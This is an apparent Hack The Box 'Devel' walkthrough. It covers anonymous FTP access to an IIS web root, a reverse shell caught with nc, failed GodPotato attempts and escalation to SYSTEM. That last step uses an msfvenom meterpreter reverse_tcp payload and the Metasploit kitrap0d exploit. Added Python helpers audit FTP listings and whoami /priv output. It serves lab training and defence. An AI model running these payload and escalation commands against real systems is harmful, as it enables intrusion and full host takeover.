Devel

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/Devel]
└─# nmap 10.129.20.13   -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-28 10:20 EST
Nmap scan report for 10.129.20.13
Host is up (0.23s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 54.62 seconds

1.2. ftp

┌──(root㉿kali)-[~/Desktop/htb/Devel]
└─# ftp 10.129.20.13
Connected to 10.129.20.13.
220 Microsoft FTP Service
Name (10.129.20.13:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
ftp> bin
200 Type set to I.
ftp> get welcome.png
local: welcome.png remote: welcome.png
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
100% |***********************************************************************************|   180 KiB   33.96 KiB/s    00:00 ETA
226 Transfer complete.
184946 bytes received in 00:05 (33.96 KiB/s)
ftp> cd aspnet_client
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49162|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          2_0_50727
226 Transfer complete.
ftp> tree
?Invalid command.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49164|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp>

The FTP root holds the default IIS website files, so we can try uploading a backdoor through it.
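What makes the listing above significant is that the anonymous FTP root contains exactly the files of the stock IIS default site (iisstart.htm, welcome.png, aspnet_client), i.e. the FTP site is rooted at the web root. The following Python helper is an added example for this writeup, not code from the original post: it parses the DOS-style listing the Microsoft FTP Service returns and reports that misconfiguration as an audit finding. The IIS_DEFAULT_SITE set and the sample listing are constructed from the output shown above.

```python
"""Audit helper for Microsoft FTP Service directory listings.

Added example for this writeup (not code from the original post). It parses
the DOS-style listing that `ftp> ls` returns from a Windows FTP server and
flags an anonymous root that carries the IIS default-site files, which is the
misconfiguration this box relies on: anonymous FTP rooted at inetpub\\wwwroot.
"""
import re
from dataclasses import dataclass
from datetime import datetime

# One listing row: "03-18-17  01:06AM       <DIR>          aspnet_client"
_ROW = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?P<size><DIR>|\d+)\s+(?P<name>.+?)\s*$"
)

# Files and folders the stock IIS default web site ships with (assumption of
# this example, taken from the listing observed on the box).
IIS_DEFAULT_SITE = {"iisstart.htm", "welcome.png", "aspnet_client"}


@dataclass(frozen=True)
class Entry:
    name: str
    is_dir: bool
    size: int            # 0 for directories
    modified: datetime


def parse_listing(text: str) -> list[Entry]:
    """Return the entries in a listing, skipping FTP protocol chatter."""
    entries = []
    for raw in text.splitlines():
        m = _ROW.match(raw.strip())
        if not m:
            continue  # e.g. "226 Transfer complete." or the ftp> prompt
        is_dir = m["size"] == "<DIR>"
        modified = datetime.strptime(f"{m['date']} {m['time']}", "%m-%d-%y %I:%M%p")
        entries.append(Entry(m["name"], is_dir, 0 if is_dir else int(m["size"]), modified))
    return entries


def looks_like_iis_webroot(entries: list[Entry]) -> bool:
    """True when every stock default-site item is present in the listing."""
    names = {e.name.lower() for e in entries}
    return IIS_DEFAULT_SITE <= names


def audit_listing(text: str) -> list[str]:
    """Findings a defender would act on for the given anonymous-root listing."""
    entries = parse_listing(text)
    findings = []
    if looks_like_iis_webroot(entries):
        findings.append("anonymous FTP root appears to be the IIS web root (inetpub\\wwwroot); "
                        "re-root the FTP site outside the web root and remove anonymous write")
    exts = {e.name.rsplit(".", 1)[-1].lower() for e in entries if not e.is_dir and "." in e.name}
    if exts & {"aspx", "asp", "ashx"}:
        findings.append("server-side script files present in the FTP root; review for web shells")
    return findings


# Constructed sample: the `ftp> ls` exchange from this box, including chatter.
SAMPLE_LISTING = """\
229 Entering Extended Passive Mode (|||49157|)
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.
"""

if __name__ == "__main__":
    for e in parse_listing(SAMPLE_LISTING):
        print(f"{'d' if e.is_dir else '-'} {e.size:>8} {e.modified:%Y-%m-%d %H:%M} {e.name}")
    for f in audit_listing(SAMPLE_LISTING):
        print("FINDING:", f)
```

Run it against a saved `ls` transcript from any Windows FTP site; the same parser also works on the nested aspnet_client listings, where the web-root check simply returns False. The second finding (script files in the FTP root) is the post-incident check: a web shell dropped over FTP shows up here as an .aspx/.asp/.ashx file with a recent modification time.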

Then catch the reverse shell:

┌──(root㉿kali)-[~/Desktop/htb/Devel]
└─# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.56] from (UNKNOWN) [10.129.20.13] 49171

PS C:\windows\system32\inetsrv> whoami
iis apppool\web
PS C:\windows\system32\inetsrv> ls


    Directory: C:\windows\system32\inetsrv

2. System

PS C:\users> tree . /a /f
Folder PATH listing
Volume serial number is 00000002 137F:3971
C:\USERS
+---Administrator
+---babis
+---Classic .NET AppPool
\---Public
    +---Documents
    +---Downloads
    +---Music
    |   \---Sample Music
    |           Kalimba.mp3
    |           Maid with the Flaxen Hair.mp3
    |           Sleep Away.mp3
    |
    +---Pictures
    |   \---Sample Pictures
    |           Chrysanthemum.jpg
    |           Desert.jpg
    |           Hydrangeas.jpg
    |           Jellyfish.jpg
    |           Koala.jpg
    |           Lighthouse.jpg
    |           Penguins.jpg
    |           Tulips.jpg
    |
    +---Recorded TV
    |   \---Sample Media
    |           win7_scenic-demoshort_raw.wtv
    |
    \---Videos
        \---Sample Videos
                Wildlife.wmv

2.1. Kernel privilege escalation

PS C:\users\public> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
>>>> SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

SeImpersonatePrivilege is present and enabled, so we go straight to GodPotato for privilege escalation.
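From the defender's side, the token shown above is the thing to audit: a compromised IIS application pool identity that holds SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege) is one step from SYSTEM. The Python script below is an added example, not code from the writeup: it parses the exact table that `whoami /priv` prints (including the `>>>>` marker the author used to highlight a row) and reports which high-risk privileges the identity holds. The HIGH_RISK table is this example's own assumption about which privileges matter most, and the sample input is constructed from the output above.

```python
"""Audit `whoami /priv` output for privileges that turn a compromised service
account into a local privilege-escalation path.

Added example, not code from the original writeup. The HIGH_RISK table is this
example's own assumption about which privileges matter most; the parser handles
the tabular format `whoami /priv` prints, including the ">>>>" marker the
author used to highlight a row.
"""
import re

# Privileges a defender should not leave on low-trust service identities
# without a reason (assumption of this example).
HIGH_RISK = {
    "SeImpersonatePrivilege": "impersonate authenticated clients (Potato-style escalation to SYSTEM)",
    "SeAssignPrimaryTokenPrivilege": "replace a process primary token",
    "SeDebugPrivilege": "open and tamper with any process",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load kernel-mode drivers",
}

# Row: optional ">>>>" marker, privilege name, free-text description, state.
_ROW = re.compile(r"^\s*(?:>+\s*)?(Se\w+Privilege)\s+(.+?)\s+(Enabled|Disabled)\s*$")


def parse_whoami_priv(text: str) -> dict[str, tuple[str, bool]]:
    """Map privilege name -> (description, currently_enabled)."""
    privs = {}
    for line in text.splitlines():
        m = _ROW.match(line)
        if m:
            name, desc, state = m.groups()
            privs[name] = (desc, state == "Enabled")
    return privs


def risky_privileges(privs, enabled_only: bool = False) -> list[tuple[str, str, bool]]:
    """(name, why it matters, enabled) for every high-risk privilege held.

    "Disabled" in whoami /priv means the privilege is present in the token but
    not currently enabled; code running as this identity can enable it with
    AdjustTokenPrivileges, so it is still held. Pass enabled_only=True to
    report only privileges that are active right now.
    """
    out = []
    for name, (_, enabled) in privs.items():
        if name in HIGH_RISK and (enabled or not enabled_only):
            out.append((name, HIGH_RISK[name], enabled))
    return sorted(out)


# Constructed sample: the iis apppool\web token shown in this writeup.
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
>>>> SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
"""

if __name__ == "__main__":
    privs = parse_whoami_priv(SAMPLE)
    for name, why, enabled in risky_privileges(privs):
        print(f"{'ENABLED ' if enabled else 'held    '} {name}: {why}")
```

On this token the report lists SeAssignPrimaryTokenPrivilege as held-but-disabled and SeImpersonatePrivilege as enabled. The distinction matters for audits: a "Disabled" row is not a missing privilege, it is one the identity can switch on at will, so inventory service and application-pool accounts by what they hold, not only by what is currently enabled. As context for the failed attempt that follows, the host reports Windows 6.1.7600 (Windows 7), whose COM runtime lives in ole32.dll; the combase.dll module that the "No combase module found" message refers to was introduced with Windows 8.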

First check the installed .NET version:

PS C:\users\public> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v3.5

So the .NET 3.5 build should be the one to use:

PS C:\inetpub\wwwroot> ./GodPotato-NET35.exe -cmd "cmd /c whoami"
[!] No combase module found
PS C:\inetpub\wwwroot> ./GodPotato-NET35.exe -cmd whoami
[!] No combase module found
PS C:\inetpub\wwwroot> .\GodPotato-NET35.exe -cmd whoami
[!] No combase module found
PS C:\inetpub\wwwroot> ./GodPotato-NET35.exe -cmd whoami
[!] No combase module found

"No combase module found" means the system is missing the COM base module (combase.dll); this is common on stripped-down systems or when the COM service is not enabled.

PS C:\inetpub\wwwroot> Get-Service COMSysApp

Status   Name               DisplayName
------   ----               -----------
Stopped  COMSysApp          COM+ System Application

The COM+ service is indeed not running.

2.2. MS11-046

MS11-046 can be used here for kernel privilege escalation.

wget https://github.com/abatchy17/WindowsExploits/blob/master/MS11-046/MS11-046.exe

In the end, privilege escalation succeeded with msf.

┌──(root㉿kali)-[~/Desktop/htb/Devel]
└─# msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.14.56 LPORT=4445 -f exe -o msf.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 177734 bytes
Final size of exe file: 184832 bytes
Saved as: msf.exe
use post/multi/recon/local_exploit_suggester
msf exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on 10.10.14.56:5555
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 2244 launched.
[*] Reflectively injecting the DLL into 2244...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.129.20.13
[*] Meterpreter session 10 opened (10.10.14.56:5555 -> 10.129.20.13:49204) at 2025-11-28 11:36:01 -0500

meterpreter > shell
Process 3416 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\inetpub\wwwroot>whoami
whoami
nt authority\system